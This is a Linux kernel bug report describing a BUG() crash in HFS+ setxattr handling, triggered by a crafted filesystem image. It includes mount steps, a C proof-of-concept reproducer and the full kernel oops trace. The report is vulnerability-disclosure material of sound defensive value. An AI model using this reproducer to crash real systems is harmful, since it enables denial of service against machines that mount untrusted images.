Bug 200295 - BUG() in hfsplus_create_attributes_file() when calling setxattr()
Summary: BUG() in hfsplus_create_attributes_file() when calling setxattr()
Status: NEW
Alias: None
Product: File System
Classification: Unclassified
Component: HFS/HFSPLUS (show other bugs)
Hardware: All Linux
: P1 normal
Assignee: fs_hfs@kernel-bugs.osdl.org
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2018-06-27 03:56 UTC by Wen Xu
Modified: 2018-06-27 03:56 UTC (History)

See Also:
Kernel Version: 4.18
Subsystem:
Regression: No
Bisected commit-id:


Attachments
The (compressed) crafted image which causes the crash (4.00 MB, application/octet-stream)
2018-06-27 03:56 UTC, Wen Xu

Description Wen Xu 2018-06-27 03:56:30 UTC
Created attachment 276897 [details]
The (compressed) crafted image which causes the crash

- Reproduce
# mkdir mnt
# mount -t hfsplus 5.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

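/*
 * Issue the xattr syscall sequence from the report against
 * "<mpoint>/foo/bar/xattr", a path inside the mounted crafted image.
 *
 * The individual xattr calls are left unchecked on purpose: the outcome
 * of interest is on the kernel side (see the kernel message below), not
 * in errno. Only what is needed to keep this program itself well-defined
 * is checked.
 */
static void activity(char *mpoint) {
  char *xattr = NULL;

  /* A failed asprintf() leaves xattr indeterminate; passing that to the
   * calls below would be undefined behaviour in the reproducer itself. */
  if (asprintf(&xattr, "%s/foo/bar/xattr", mpoint) < 0) {
    perror("asprintf");
    return;
  }

  /* 113-byte zeroed buffer, reused as the listxattr() output buffer and
   * as the value written by both setxattr() calls. */
  char buf2[113];
  memset(buf2, 0, sizeof(buf2));

  listxattr(xattr, buf2, sizeof(buf2));
  removexattr(xattr, "user.mime_type");
  setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE);
  setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE);

  free(xattr);
}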

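/*
 * Entry point. Usage: ./poc <mountpoint>, where <mountpoint> is the
 * directory the crafted image is mounted on.
 *
 * Returns 0 after running the reproducer, 1 when the mountpoint argument
 * is missing (the original passed argv[1] through unchecked, so running
 * without an argument dereferenced NULL in asprintf()).
 */
int main(int argc, char *argv[]) {
  if (argc < 2 || argv[1] == NULL) {
    fprintf(stderr, "usage: %s <mountpoint>\n", argv[0]);
    return 1;
  }
  activity(argv[1]);
  return 0;
}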

- Kernel message
[  172.954208] ------------[ cut here ]------------
[  172.954215] kernel BUG at fs/hfsplus/xattr.c:181!
[  172.955390] invalid opcode: 0000 [#1] SMP KASAN PTI
[  172.956718] CPU: 1 PID: 1415 Comm: a.out Not tainted 4.18.0-rc1+ #6
[  172.958053] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  172.960077] RIP: 0010:__hfsplus_setxattr+0x1086/0x1160
[  172.961143] Code: e8 af 0c de ff 4c 8b 85 08 fd ff ff 41 c7 40 38 00 00 00 00 e9 7b f1 ff ff 48 c7 c7 00 40 96 ae e8 93 42 bb ff e9 1a f5 ff ff <0f> 0b 4c 8b 85 b0 fc ff ff 48 8b bd d8 fc ff ff be 04 00 00 00 4c
[  172.965030] RSP: 0018:ffff8801eb687788 EFLAGS: 00010206
[  172.966117] RAX: 0000000000000000 RBX: ffff8801eebb4908 RCX: ffffffffad5bc134
[  172.967574] RDX: dffffc0000000000 RSI: ffff8801eebb4da8 RDI: ffff8801eebb4d58
[  172.969041] RBP: ffff8801eb687b08 R08: ffff8801e288c000 R09: ffffed003dd769b3
[  172.970499] R10: 0000000000000001 R11: ffffed003dd769b2 R12: ffff8801ec198000
[  172.971967] R13: ffff8801eebb4d08 R14: ffff8801e21a0540 R15: ffff8801eb687ae0
[  172.973423] FS:  00007fe64916a700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000
[  172.975069] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  172.976262] CR2: 000000000129c008 CR3: 00000001e5e58000 CR4: 00000000000006e0
[  172.977729] Call Trace:
[  172.978296]  ? unwind_get_return_address+0x36/0x50
[  172.979330]  ? kasan_check_write+0x14/0x20
[  172.980232]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  172.981181]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  172.982394]  ? save_stack+0x46/0xd0
[  172.983133]  ? kasan_kmalloc+0xad/0xe0
[  172.983941]  ? kmem_cache_alloc_trace+0x102/0x200
[  172.984927]  ? hfsplus_setxattr+0x4c/0xb0
[  172.985770]  ? hfsplus_user_setxattr+0x27/0x30
[  172.986716]  ? __vfs_setxattr+0x7c/0xa0
[  172.987522]  ? __vfs_setxattr_noperm+0x8d/0x200
[  172.988478]  ? vfs_setxattr+0xb3/0xc0
[  172.989248]  ? setxattr+0x1b3/0x260
[  172.989982]  ? path_setxattr+0x134/0x170
[  172.990811]  ? __x64_sys_setxattr+0x6d/0x80
[  172.991700]  ? do_syscall_64+0x78/0x170
[  172.992519]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  172.993602]  ? save_stack+0xb5/0xd0
[  172.994339]  ? save_stack+0x46/0xd0
[  172.995077]  ? kasan_kmalloc+0xad/0xe0
[  172.995878]  ? __kmalloc_node+0x11e/0x2e0
[  172.996738]  ? kvmalloc_node+0x31/0x80
[  172.997527]  ? setxattr+0x114/0x260
[  172.998261]  ? path_setxattr+0x134/0x170
[  172.999085]  ? __x64_sys_setxattr+0x6d/0x80
[  172.999973]  ? do_syscall_64+0x78/0x170
[  173.000782]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  173.001870]  ? save_stack+0xb5/0xd0
[  173.002610]  ? save_stack+0x46/0xd0
[  173.003349]  ? __kasan_slab_free+0x13c/0x1a0
[  173.004257]  ? kasan_slab_free+0xe/0x10
[  173.005079]  ? kmem_cache_free+0x89/0x1e0
[  173.005929]  ? putname+0x80/0x90
[  173.006610]  ? filename_lookup+0x191/0x280
[  173.007465]  ? kasan_unpoison_shadow+0x36/0x50
[  173.008407]  ? kasan_kmalloc+0xad/0xe0
[  173.009201]  ? kmem_cache_alloc_trace+0x102/0x200
[  173.010183]  hfsplus_setxattr+0x8a/0xb0
[  173.010992]  hfsplus_user_setxattr+0x27/0x30
[  173.011899]  __vfs_setxattr+0x7c/0xa0
[  173.012675]  __vfs_setxattr_noperm+0x8d/0x200
[  173.013588]  vfs_setxattr+0xb3/0xc0
[  173.014326]  setxattr+0x1b3/0x260
[  173.015031]  ? vfs_setxattr+0xc0/0xc0
[  173.022586]  ? filename_lookup+0x191/0x280
[  173.023449]  ? filename_parentat+0x2b0/0x2b0
[  173.024364]  ? kasan_kmalloc+0xad/0xe0
[  173.025157]  ? kasan_check_write+0x14/0x20
[  173.026040]  ? strncpy_from_user+0xa8/0x1c0
[  173.026923]  ? __mnt_is_readonly.part.13+0x23/0x30
[  173.027936]  ? __mnt_want_write+0x9d/0xb0
[  173.028783]  path_setxattr+0x134/0x170
[  173.029573]  ? setxattr+0x260/0x260
[  173.030317]  ? vm_brk+0x20/0x20
[  173.030986]  __x64_sys_setxattr+0x6d/0x80
[  173.031842]  do_syscall_64+0x78/0x170
[  173.032619]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  173.033695] RIP: 0033:0x7fe648c8b1fa
[  173.034443] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  173.038299] RSP: 002b:00007ffd5dbc6bd8 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc
[  173.039843] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fe648c8b1fa
[  173.041329] RDX: 00007ffd5dbc6c00 RSI: 00000000004008a4 RDI: 000000000129c080
[  173.042795] RBP: 00007ffd5dbc6c80 R08: 0000000000000001 R09: 0000000000000000
[  173.044256] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0
[  173.045710] R13: 00007ffd5dbc6d80 R14: 0000000000000000 R15: 0000000000000000
[  173.047174] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  173.057207] ---[ end trace 7f5a46c7478f1295 ]---
[  173.058199] RIP: 0010:__hfsplus_setxattr+0x1086/0x1160
[  173.059270] Code: e8 af 0c de ff 4c 8b 85 08 fd ff ff 41 c7 40 38 00 00 00 00 e9 7b f1 ff ff 48 c7 c7 00 40 96 ae e8 93 42 bb ff e9 1a f5 ff ff <0f> 0b 4c 8b 85 b0 fc ff ff 48 8b bd d8 fc ff ff be 04 00 00 00 4c
[  173.063633] RSP: 0018:ffff8801eb687788 EFLAGS: 00010206
[  173.065012] RAX: 0000000000000000 RBX: ffff8801eebb4908 RCX: ffffffffad5bc134
[  173.066580] RDX: dffffc0000000000 RSI: ffff8801eebb4da8 RDI: ffff8801eebb4d58
[  173.068219] RBP: ffff8801eb687b08 R08: ffff8801e288c000 R09: ffffed003dd769b3
[  173.069694] R10: 0000000000000001 R11: ffffed003dd769b2 R12: ffff8801ec198000
[  173.071151] R13: ffff8801eebb4d08 R14: ffff8801e21a0540 R15: ffff8801eb687ae0
[  173.072671] FS:  00007fe64916a700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000
[  173.074329] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  173.075505] CR2: 000000000129c008 CR3: 00000001e5e58000 CR4: 00000000000006e0

- Location
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/xattr.c#L181
	BUG_ON(i_size_read(attr_file) != 0);

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.
